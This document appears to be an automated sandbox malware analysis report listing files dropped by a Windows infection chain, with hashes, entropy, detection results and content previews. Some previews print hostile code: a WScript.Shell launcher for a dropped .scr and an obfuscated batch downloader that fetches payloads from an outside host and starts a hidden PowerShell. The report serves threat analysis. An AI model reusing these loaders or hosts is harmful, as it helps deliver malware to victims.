                                                                          SHA-256:3D5BBE7F492DB67D8EE035A56F85CEC0DB56B4CC9143A949ED1FA7E832E387F7
                                                                          SHA-512:C2846B3CD02671E15DD942690476D5C802ECBFE3861CA352C3080AB3576164C14726B679E9DBC2352C1BD8F71DEBEB01E3AB48E8F301DD9D56FA0B0BD0C59C24
                                                                          Malicious:true
                                                                          Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.scr\" \"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R\"")
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):893608
                                                                          Entropy (8bit):6.62028134425878
                                                                          Encrypted:false
                                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Joe Sandbox View:
                                                                          • Filename: c2.hta, Detection: malicious
                                                                          • Filename: c2.hta, Detection: malicious
                                                                          • Filename: FwR7as4xUq.exe, Detection: malicious
                                                                          • Filename: InsertSr.exe, Detection: malicious
                                                                          • Filename: vqMMwqCFZQ.exe, Detection: malicious
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious
                                                                          • Filename: eddzD2MA12.exe, Detection: malicious
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):257339
                                                                          Entropy (8bit):7.999363363076799
                                                                          Encrypted:true
                                                                          SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                          MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                          SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                          SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                          SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\mshta.exe
                                                                          File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3432
                                                                          Entropy (8bit):5.234062070088092
                                                                          Encrypted:false
                                                                          SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                          MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                          SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                          SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                          SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                          Malicious:true
                                                                          Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):21979
                                                                          Entropy (8bit):5.049158677118914
                                                                          Encrypted:false
                                                                          SSDEEP:384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
                                                                          MD5:E85ADBB7806D6C2B446681F25E86C54E
                                                                          SHA1:7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
                                                                          SHA-256:1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
                                                                          SHA-512:D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):893608
                                                                          Entropy (8bit):6.62028134425878
                                                                          Encrypted:false
                                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Joe Sandbox View:
                                                                          • Filename: c2.hta, Detection: malicious
                                                                          • Filename: c2.hta, Detection: malicious
                                                                          • Filename: FwR7as4xUq.exe, Detection: malicious
                                                                          • Filename: InsertSr.exe, Detection: malicious
                                                                          • Filename: vqMMwqCFZQ.exe, Detection: malicious
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious
                                                                          • Filename: fT0L8msd6q.exe, Detection: malicious
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious
                                                                          • Filename: qaHUaPUib8.exe, Detection: malicious
                                                                          • Filename: eddzD2MA12.exe, Detection: malicious
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):257339
                                                                          Entropy (8bit):7.999363363076799
                                                                          Encrypted:true
                                                                          SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                          MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                          SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                          SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                          SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                          Malicious:false
                                                                          Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):65440
                                                                          Entropy (8bit):6.049806962480652
                                                                          Encrypted:false
                                                                          SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                          MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                          SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                          SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                          SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):89403
                                                                          Entropy (8bit):7.99813128639969
                                                                          Encrypted:true
                                                                          SSDEEP:1536:WvzNmlhJS1NqPa2dvcaUjV1a8lW12m0tJURtrJFubAca7D87sxHf:Wv8iNCDcS8kQsz2bAcaE7sxHf
                                                                          MD5:3FF8403A4564EE7F0732F6A1ECEB194C
                                                                          SHA1:C9EFFAC660CDD5B789928EB9C1AFF4A79F2EAED6
                                                                          SHA-256:7EADEF0349D3391EAAA4931B910A12239F118AF38FFEBF5C54C68BDC5CEAAA3E
                                                                          SHA-512:8859C01D4CC10D0F09FD86F56B30E38073C973397775741BCEEC26F3F12423E22BA3B765C234D42A5DF705021AFA8DE2EF50E90F9E01931060A94ECEE1CEE698
                                                                          Malicious:false
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):89088
                                                                          Entropy (8bit):7.99803755231603
                                                                          Encrypted:true
                                                                          SSDEEP:1536:4HUCJTibUP87NmFlHoTTX91f9FjcCKxMxdcAwPPLDAdd+DgEbGOHNN+d6n3hlcFD:SWbv8F94f1Fjc6x4Tmd+DeOtN+dURlav
                                                                          MD5:DC54D0D4B55783075A2501B87D0C8D31
                                                                          SHA1:FEF29A787871C091260C34301D451BE56601CF53
                                                                          SHA-256:EFEC3D913AAF25D26D8EC4652340E132A0739B319DB62B12D2332461A2544777
                                                                          SHA-512:EABDCFE474DB5B0EA0CC5AE6D3E0CA11B2D785F2C47E1716983E7196CBDE306B69111123C602C40CCABF72481694D7C32E8FE61AE2C38581D04F768A869839CE
                                                                          Malicious:false
                                                                          Preview:.ke..)....-}f..-...._.....5..'......&.4X...I../...<.....l..4@B..."..J.).FJ.v:^....%.././....+.9..5}....\l.jS..3...ev.B...%...S.S...cG.=j.I).i..\..*.... .2.q<..v+..N.B.^.%.r.k..4...*7....pB..G.B7.Y.................-t.e.(.Q...C5....j.h}.n.....Z..........zE.~..I.t....XY...b..P|......\..3..hc].......)..k.....[_.J.g&\..3..a..h....w...h...J...e.n.sg,.j..r...N..K{..._1..by..2]j.Z.cb.D....D.b...9.t..D.M.2-...%.L~$6..aZ.Z.h't.*.|....i.Z...&..(...Z.....f...P..f.?.[......D....l.......v|..e...,......?...+.jvG..)...Z.Trx...H.{.......v..f.0.Mc..e'k.....1..@..k.Jvj..H..v.U'J@..U.].Z..P>Pp..<.+.X8B.R.....,%.y..k..._(.HG..|..%.CaI......P.....nN..&F.hH...+....|P.h..)$"Em.(-./..+.....!.........BI$'.........x....b...o.b.v......._.....#.j.."[. ..b..h......j..*MH.".a^.q...fF.HB*.w..)D.......Ms:.a...h.....QL.~3..v8....[..*C.....GA..jo...,..Z..m....Z`.W2.<..N....L..w.e.uoV9..d..E..C.d8...C...?....e....M9P.x2.Gt.yv.6..e.~.?@j....L^A*Z....L.Y..C..e....0...]@....qZ".
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.4969396028059014
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8qKDaRlDCH:Qw946cPbiOxDlbYnuRKtKYc
                                                                          MD5:8B44E256E146333D8DD68B98EFADE861
                                                                          SHA1:39D10467519DD3E1F13A7B61B2267C809DB6B40D
                                                                          SHA-256:53A4B8F43F58C984B6913D6DAFEE063EA2E2C04C46C4CF9C3B7D694D9557BD73
                                                                          SHA-512:1F18E3845AD1E0AA03E9C89587FC8DCF58889F38A3FCE2F61DCDF480593B589D09F82B53FD60E596CA33578D685F0460840CE7952191CE6A8D57709110A81E3D
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.1.2./.2.0.2.4. . .1.3.:.0.7.:.2.3. .=.=.=.....
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):885684
                                                                          Entropy (8bit):6.621979600120346
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:uxz1JMyyzlohMf1tN70aw8501
                                                                          MD5:B52BB2B76BB34CE2AD510641DB438931
                                                                          SHA1:316D724878B112E97A432EC85D10A993BF073274
                                                                          SHA-256:0AE073B61844F6F34FA87101DC67487FE4256547A5633D8362BBE659B3CBBFED
                                                                          SHA-512:06A3DF9F4910E6C45A074368F3182A37CFC1DE91C749FDBF9C874FB23A555EDB1425534B62E63B23823744A7DF89A677A0455C08563B10F5F74F155014865702
                                                                          Malicious:false
                                                                          Preview:..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.........xL....t{..xL.3.V....0...M.8V:t..V:9............}.........t...td...t....tQ...tC~)....1.~8.uVWQ....I....t....t..u..#0...F8.3.@^_]...3........}......F8.....
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):9301
                                                                          Entropy (8bit):5.189766528618456
                                                                          Encrypted:false
                                                                          SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                          MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                          SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                          SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                          SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                          Malicious:false
                                                                          Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):9301
                                                                          Entropy (8bit):5.189766528618456
                                                                          Encrypted:false
                                                                          SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                          MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                          SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                          SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                          SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                          Malicious:false
                                                                          Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):78848
                                                                          Entropy (8bit):7.997642474583827
                                                                          Encrypted:true
                                                                          SSDEEP:1536:C8rW6c7wZq1wCXK1yDWHgpipHZAGuQetnB3vzrCtvPCoj2fQCyqMsgkE:dK7wZdCX3zopyyet1fmvPCToq8
                                                                          MD5:1C2CD5510A8B8BE255D26B74FBFC61EF
                                                                          SHA1:8DD84BE3314E46C2A41BFBD2D9873859D3F88B54
                                                                          SHA-256:8F7445D8F645AF42CC36F82642DF091756CF5DF22C5E32E695C5EB999194B0E5
                                                                          SHA-512:E0CE8FDB77E40CB073A0FEEDDCBCFF075439F601224374445E578B4BC02AC01B3A114E0612D7A6D90214F1D4AC2ACFE380DF4E8DBD3E428A8D9496E39C4F22A7
                                                                          Malicious:false
                                                                          Preview:>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V......*.U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5*l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W..*..u..*.a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-|Cdg.L.........J.8{| ..5...-.h....!.... f.W..p.^...*.&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...*b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n
                                                                          Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):7938
                                                                          Entropy (8bit):6.234825901896176
                                                                          Encrypted:false
                                                                          SSDEEP:192:BHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3ygxn:BHAHhww+/2nlP3r1WAL3yQn
                                                                          MD5:E65ADD0B46D5C8C0DEC008C11CBD71A5
                                                                          SHA1:894028D96A4649AC5403F3CE0FAF0C686AED4E32
                                                                          SHA-256:17610DA19952CEA20324EA64C7D6A8F27F21C639845F1C14B21194A0F5C2EA99
                                                                          SHA-512:B5FF13313576084EE8B0631F4F7D2518186165D25F7AB3DF7273A8CEF2D47E1DF322602A36441A4072A94B1F5E55D75DC5706CF92DBCAAD72B29B9E397BE6649
                                                                          Malicious:false
                                                                          Preview:DimPieLilHot..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.33860678500249
                                                                          Encrypted:false
                                                                          SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                          MD5:C3FEDB046D1699616E22C50131AAF109
                                                                          SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                          SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                          SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                          Malicious:false
                                                                          Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15114
                                                                          Entropy (8bit):5.374001707205436
                                                                          Encrypted:false
                                                                          SSDEEP:384:nB3wPR95U1gQzye1lSgeqQPSm12VJ7/RixaOYcYdtNykhGsZPmOzXyXCPMe8mf3S:MIu
                                                                          MD5:81D7838094FA362B2FB9B4FCF2AB7082
                                                                          SHA1:D57FB62B9EEDD0110DF21067156E5A8933EDDEF2
                                                                          SHA-256:1F7A5AFEA5D207852FD57F1966AE1A35C0211ED1B5A1BFFD6E1AB217D69290B8
                                                                          SHA-512:E421AC2572A2F9FA12CB76BECEEE0826BF6E89A0FF37AD0F8955202A155A2F94D1495B634E55124A3D26E72CE6A120215892575DE5047E848A0A2733A6106540
                                                                          Malicious:false
